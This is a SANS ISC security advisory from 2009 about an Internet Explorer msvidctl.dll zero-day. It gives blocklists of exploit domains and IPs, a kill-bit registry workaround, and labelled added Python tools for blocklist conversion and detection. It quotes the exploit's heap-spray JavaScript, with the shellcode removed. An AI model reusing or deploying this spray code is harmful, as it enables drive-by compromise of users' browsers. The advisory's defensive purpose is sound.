
SANS ISC InfoSec Handlers Diary Blog



IE 0day exploit domains (constantly updated)

Published: 2009-07-06
Last Updated: 2009-07-17 20:36:33 UTC
by Andre Ludwig (Version: 19)

This diary entry contains a list of domains that are exploiting the new IE 0-day, as well as secondary domains that are hosting potentially malicious binaries used in these attacks. This list has been produced as a combined effort of researchers, vendors, and volunteers; you can thank the groups below for their efforts and their willingness to share this information with the public. This list is intended to serve as a quick way to provide protection against these attacks by identifying domains that are hosting these (and potentially other) exploits. This list is not formatted for any specific file format; it is up to you, the reader, to translate this data into the proper formatting that your environment requires.

** In regards to IDS/IPS signatures, I would highly suggest looking for the malformed file vs trying to catch every permutation of the JS/HTML seen. Emerging Threats has a signature that looks for the malformed file; it can be found in their main rules file: 2009493 - ET CURRENT_EVENTS Likely MSVIDCTL.dll exploit in transit (emerging.rules)


This diary entry will be updated frequently. The information provided has had varying degrees of verification performed on it; as such, it is provided as is. There may very well be mistakes, mistakes that may result in legitimate sites being blocked if you choose to use this list as a block list.


Update: Removed some false positives (netvibes.com, blog.segu-info.com.ar, as well as a few IP addresses)

Update: Removed www.dubro.com, which reported back that they cleaned up the malicious files.


Link on how to leverage DNS to blackhole/redirect queries.

http://www.malwaredomains.com/bhdns.html

Google Cache version of the above link
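The diary leaves it to the reader to turn the raw list into whatever format their environment needs. The following is an added example (not part of the diary, and not the tool behind the malwaredomains.com link above) that does the conversion safely: it validates each line as a hostname or IPv4 address, drops repeats, rejects anything that would not belong in a blocklist, and emits both a hosts-file and BIND named.conf zone statements for a blackhole resolver. The sample input is constructed (two entries are taken from the diary's list, the rest are made up to exercise the edge cases), and the zone-file name blockeddomain.hosts is an assumption.

```python
from __future__ import annotations
import re
from typing import Iterable

# Constructed sample in the same shape as the diary's list. Two entries are taken
# from the list below; the repeated entry, the bare IP and the junk line are
# included on purpose to show how each is handled.
SAMPLE_LIST = """
vip762.3322.org
3b3.org
3b3.org
www.27pay.com
110.165.41.103
not a domain!
"""

# Hostname syntax: dot-separated labels of letters, digits and hyphens,
# no leading or trailing hyphen, at least one dot.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)+{_LABEL}$")
_IPV4_RE = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$"
)


def parse_indicators(text: str) -> tuple[list[str], list[str], list[str]]:
    """Split raw list text into (domains, ips, rejected): lower-cased,
    de-duplicated, first-seen order kept. Anything that is neither a
    syntactically valid hostname nor an IPv4 address is rejected rather
    than silently written into a blocklist."""
    domains: list[str] = []
    ips: list[str] = []
    rejected: list[str] = []
    seen: set[str] = set()
    for raw in text.splitlines():
        item = raw.strip().lower().rstrip(".")
        if not item or item in seen:
            continue
        seen.add(item)
        if _IPV4_RE.match(item):
            ips.append(item)
        elif len(item) <= 253 and _HOSTNAME_RE.match(item):
            domains.append(item)
        else:
            rejected.append(item)
    return domains, ips, rejected


def to_hosts_file(domains: Iterable[str], sinkhole: str = "127.0.0.1") -> str:
    """hosts-file format: one sinkhole line per domain."""
    return "".join(f"{sinkhole} {d}\n" for d in domains)


def to_bind_zone_config(domains: Iterable[str], zone_file: str = "blockeddomain.hosts") -> str:
    """named.conf zone statements that make the resolver authoritative for each
    listed domain, so every name under it resolves to whatever the shared zone
    file says (the same idea as the blackhole setup linked above; the zone-file
    name is an assumption)."""
    return "".join(f'zone "{d}" {{ type master; file "{zone_file}"; }};\n' for d in domains)


if __name__ == "__main__":
    doms, ips, bad = parse_indicators(SAMPLE_LIST)
    print(to_hosts_file(doms), end="")
    print(to_bind_zone_config(doms), end="")
    print("bare IPs (block at the firewall or proxy, not in DNS):", ips)
    print("rejected lines, review by hand:", bad)
```

Bare IPs come out separately because a DNS blackhole cannot act on them; they belong in a firewall or proxy rule. The rejected list is the place to look before deploying, given the diary's own warning that the list may contain mistakes.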


Massive thanks go to the following contributors:

Google
Symantec
Websense
CSIS
UCSB-Wepawet
IBM X-Force
Sunbelt Software
Telenor SOC
blog.zol.com.cn


List of exploit domains:

vip762.3322.org
3b3.org
www.27pay.com
www.hao-duo.com
dump.vicp.cc
64tianwang.com
webxue38.3322.org
556622.3322.org
jfg1.3322.org
df56y.3322.org
javazhu.3322.org
8dfgdsgh.3322.org
ceewe3w2.cn
js.tongji.linezing.com
h65uj.8866.org
45hrtt.8866.org
8oy4t.8866.org
www.mjbox.com
2wdqwdqw.cn
www.vbsjs.cn
cdew32dsw.cn
qvod.y2y2dfa.cn
kan31ni.cn
www.duiguide.us
gkiot.cn
www.carloon.cn
movie.wildmansai.com
www.7iai.cn
www.jazzhigh.com
www.netcode.com
6ik76.8866.org
76ith.8866.org
qd334t.8866.org
u5hjt.8866.org
vpsvip.com
x16ake8.6600.org
www.huimzhe.cn
www.hostts.cn
ucqh.6600.org
qitamove.kmip.net
news.85580000.com
guama.9966.org
dx123.9966.org
ds355.8866.org
dnf.17xj.cn
dasda11d.cn
d212dddw.cn
ckt5.cn
ccfsdee32.cn
aaa.6sys6.cn
9owe2211.cn
8man7.3322.org
6gerere3e.cn
66yttrre.cn
tongji520.com
www.google-cdma.com
443ggr.8800.org
caonimabi.r154q.cn
ckt4.cn
fdg5.cn
home.xzx6.cn
q23r.cn
wf3gr.8800.org
www.ddlse.cn
www.gamezv.com
ads.v8dc.com
www.college360.cn
name81.8u60.8u.cn
wvg7.cn
ma.o524q.cn
laibuji.w528e.cn
girlfired.d821e.cn
www.haosecc1.com.cn
ok.swfover.info
4gameranking.com
blog20fc2.com
fwefr43.cn
bybyybyb.com
wr323e2e2.cn
www.tingcao.com
www.njpfw.com
qhjjyy.7766.org
www.google-cdn.com
www.fdsdffdfsf.cn
a444.dnf5.com
www.hi2i.cn
www.xsdg.cn
19743.yfyf.net
a22.7766.org
ad.sxserve.com
al0900.cn
allmuzz.ru
andrewkim.us
asfdasfasf.3322.org
assaaa.cn
b35.info
baidu.1cznn9.com.cn
bbs.ttrpg.net
bbssifu.cn
blog.foolmountain.com
blogs.weedns.com
buffer-ad.qvodwf.com
buhsvarna.com
by.asnfhaksfhnasf15215.cn
ce.ceceshishi888.cn
cgi35.plala.or.jp
code.5i28.com
compcycle.org
dex.blogsite.org
down.ezua.com
dshgfh43.9966.org
dubai.2ch.net
frumin.com
haatz.tistory.com
herhun2.cech.com.cn
hosts.dnfdf.com
hzone666.com
ihaveit777.info
jjgan.9966.org
jkjjkk.cn
kjkkkk.cn
li28.vicp.net
mmsifu.cn
nbl.com.tw
ngnggg.cn
nms.asjkghajkgh15.cn
nosternos.com
orerss.3322.org
qhmm.7766.org
qhwyt.8800.org
rfsb.xicp.net
rkrkrk.9966.org
secgov.xtycoon.org
serve.sxserve.com
shell.yfyf.net
sp5201314.w11.kj400.cn
srv.v-i-e-w.net
tag.gamersabc.com
theoschepens.nl
thewifihack.com
thtttt.cn
trughtsa.com
up.hmwz.net
usrvnu.ru
usrvzi.ru
ustrania.com
uuuyyy.3322.org
uyuuuu.cn
vip.ddoshacker.cn
vipguibin22.3322.org
ww.wytzt.cn
ww2.niupan.com
www.192idc.cn
www.78195.com
www.7hacker.com
www.92shaiya.cn
www.almasto.net
www.asialoverfinder.com
www.cvskr.com
www.debonairblog.com
www.dgcft.sems.gob.mx
www.dgfdffdfs.cn
www.dgzhangfeiyijue.com
www.dztv.cn
www.funoyun.com
www.geminicarsltd.com
www.glintsun.com
www.hanrss.com
www.info-yimg.com
www.iuwei.com
www.jy-hx.cn
www.l1il.cn
www.mflian.com.cn
www.mvilcd.net
www.mysnda.com
www.nicovedeo.com
www.normb.net
www.pasch.or.at
www.qinpengejia.cn
www.samkr.com
www.tech2tech.cn
www.usssakc.com
www.uygurie.com
www.veritech.co.kr
www.ws91.cn
www.xfgh.gov.cn
www.yahoo-mail.net.ru
www.yamaill.com
www.zbea.com
x166da.6600.org
xewyny.ru
ytvccc.cn
yuyyyu.cn
zxj.3video.cn
1ive.3322.org
3wjjyy.7766.org
5x.slyip.net
66aaaaaa.com
97wyqq.8866.org
17928.yfyf.net
99813.com
www.fireofliberty.org
tt99lov.cn
ee99zz.8866.org
syweb2.71w.org
ws234.cxhost.cn
6u6u8.cncsz.net
f1y.in

Second stage domains (binaries downloaded from these domains):

www.73yi.cn
w1.7777ee.com
w2.7777ee.com
w3.7777ee.com
w8.7777ee.com
w9.7777ee.com
milllk.com
haha999b.com
babi2009.com
haha888l.com
xin765.com


IPs (no domain used in the exploit page):

110.165.41.103
85.17.162.100


0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks

Published: 2009-07-06
Last Updated: 2009-07-07 14:08:53 UTC
by Stephen Hall (Version: 2)

A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors' updates to ensure coverage as early as possible on this exploit, as it is likely to be widely deployed now that the code is available.

A valid workaround for the attack vector is available, which sets the kill bit on the vulnerable DLL:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
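After rolling the workaround out, the question is whether it actually landed on every machine. The following is an added example, not from the diary or from Microsoft, that checks a .reg export (for instance one collected by a login script with reg export) for the kill bit on the CLSID above. The kill bit is the 0x400 flag in Compatibility Flags, which is the value the snippet writes; the sample export is constructed to look like the workaround read back out of a patched machine.

```python
from __future__ import annotations
import re

# ActiveX Compatibility flag that tells Internet Explorer never to instantiate
# the control (the "kill bit"); 0x400 is the value the diary's .reg snippet writes.
KILL_BIT = 0x00000400
# CLSID from the diary's snippet (the msvidctl control).
MSVIDCTL_CLSID = "{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}"

# Constructed sample: the workaround as it looks when exported back out of the
# registry on a machine where it was applied.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
"""

_KEY_RE = re.compile(r"^\[(.+)\]\s*$")
_DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{1,8})\s*$')


def parse_reg(text: str) -> dict[str, dict[str, int]]:
    """Map key path -> {value name: int} for the dword values in a .reg export.
    Only dword values are decoded; other value kinds are ignored."""
    result: dict[str, dict[str, int]] = {}
    current = None
    for line in text.splitlines():
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            result.setdefault(current, {})
            continue
        m = _DWORD_RE.match(line)
        if m and current is not None:
            result[current][m.group("name")] = int(m.group("hex"), 16)
    return result


def kill_bit_set(reg: dict[str, dict[str, int]], clsid: str = MSVIDCTL_CLSID) -> bool:
    """True only if an ActiveX Compatibility key for clsid exists (HKLM or the
    per-user hive) and its Compatibility Flags value has the kill bit on."""
    suffix = ("\\ActiveX Compatibility\\" + clsid).upper()
    for key, values in reg.items():
        if key.upper().endswith(suffix):
            return bool(values.get("Compatibility Flags", 0) & KILL_BIT)
    return False


if __name__ == "__main__":
    print("kill bit set:", kill_bit_set(parse_reg(SAMPLE_REG)))
```

The check is a bitwise test rather than an equality test on 0x400, so a key that already carried other compatibility flags still passes as long as the kill bit is among them. On a live Windows host the same test can be run against the registry directly (for example with Python's winreg module or with PowerShell's Get-ItemProperty) instead of parsing an export.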

Details of the exploit are available on the CSIS web site, but are included below:


var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;   // assembles '%u9090%u9090' (a NOP sled) from fragments to evade simple string matching
[SHELL CODE REMOVED]
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;                 // dashell is the shellcode string removed above
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)               // grow one sled block to about 0x30000 characters
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)                                        // heap spray: 300 copies of sled + shellcode
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');            // instantiate the vulnerable control
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';                               // data file handed to the control
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
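The snippet shows three things a reviewer of captured web content can look for: a NOP-sled string assembled from fragments and passed to unescape(), the msvidctl CLSID set as an object classid, and a large array-fill loop. The handler's advice above to match the malformed file rather than chase JS permutations still stands; the following is an added triage aid for page content pulled from a proxy or sandbox, not part of the diary or of any vendor signature. It first folds the simple obfuscations seen here ('a'+'b' concatenation and variables holding one literal) so that the split '%u9090' string becomes visible, then reports the three traits. The sample page is constructed from the shape of the snippet above, with the shellcode omitted as it is on the page; all function and pattern names are this example's own.

```python
from __future__ import annotations
import re

# CLSID of the control the diary's snippet instantiates (lower-cased for comparison).
MSVIDCTL_CLSID = "0955ac62-bf2e-4cba-a2b9-a63f772d46cf"

# Constructed sample reproducing the shape of the diary's snippet; the shellcode
# string (dashell) is omitted here as it is on the page.
SAMPLE_PAGE = r"""
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var omybro=unescape(nndx);
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
"""

_CONCAT_RE = re.compile(r"'([^'\\]*)'\s*\+\s*'([^'\\]*)'")
_VAR_LITERAL_RE = re.compile(r"var\s+(\w+)\s*=\s*'([^'\\]*)'\s*;")
_UNESCAPE_RE = re.compile(r"unescape\(\s*'((?:%u[0-9a-fA-F]{4})+)'\s*\)")
_CLASSID_RE = re.compile(r"classid\s*=\s*'clsid:([0-9a-fA-F-]{36})'")
_FILL_LOOP_RE = re.compile(r"for\s*\([^)]*<\s*(\d+)[^)]*\)\s*\w+\[\w+\]\s*=")


def fold_string_literals(js: str, max_rounds: int = 5) -> str:
    """Undo two simple obfuscations seen in the snippet: 'a'+'b' concatenation
    and variables that hold a single string literal. Repeats until stable so
    that a variable built from fragments is itself folded into later uses."""
    for _ in range(max_rounds):
        before = js
        while True:  # 'a' + 'b' -> 'ab', left to right, until nothing changes
            folded = _CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", js)
            if folded == js:
                break
            js = folded
        for name, lit in _VAR_LITERAL_RE.findall(js):
            # Replace uses of `name` (not its own declaration) with the literal.
            pattern = rf"(?<![\w'.]){re.escape(name)}(?![\w'])(?!\s*=[^=])"
            js = re.sub(pattern, lambda m, lit=lit: "'" + lit + "'", js)
        if js == before:
            break
    return js


def scan(js: str) -> list[str]:
    """Return human-readable findings for the three traits the snippet shows:
    a NOP-sled-like unescape() string, the kill-bitted CLSID in an object
    classid, and a large array-fill loop."""
    findings: list[str] = []
    folded = fold_string_literals(js)
    for m in _UNESCAPE_RE.finditer(folded):
        words = [w.lower() for w in re.findall(r"%u([0-9a-fA-F]{4})", m.group(1))]
        if len(words) >= 2 and len(set(words)) == 1:
            findings.append(f"unescape() of repeated %u{words[0]} (NOP-sled-like)")
    for m in _CLASSID_RE.finditer(folded):
        if m.group(1).lower() == MSVIDCTL_CLSID:
            findings.append("object classid is the msvidctl CLSID")
    for m in _FILL_LOOP_RE.finditer(folded):
        if int(m.group(1)) >= 100:
            findings.append(f"array fill loop of {m.group(1)} iterations (heap-spray-like)")
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PAGE):
        print("-", f)
```

The folding step is what makes the first two checks hold up against the trivial split-string trick in the snippet; a different obfuscator (eval of decoded text, String.fromCharCode arrays) would need its own pass, which is exactly why the handler prefers catching the malformed file on the wire. Treat a hit on the CLSID check alone as worth a look and a hit on all three as a page to pull and examine.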

UPDATE July 6, 2009 19:00 UTC

Microsoft have released an advisory for the exploit; it can be found here:
http://www.microsoft.com/technet/security/advisory/972890.mspx

In addition, they have published a number of blog entries to cover their user base:
http://blogs.technet.com/msrc/default.aspx
http://www.microsoft.com/technet/security/advisory/default.mspx
http://blogs.technet.com/srd/

Keywords: msVidCtl zero day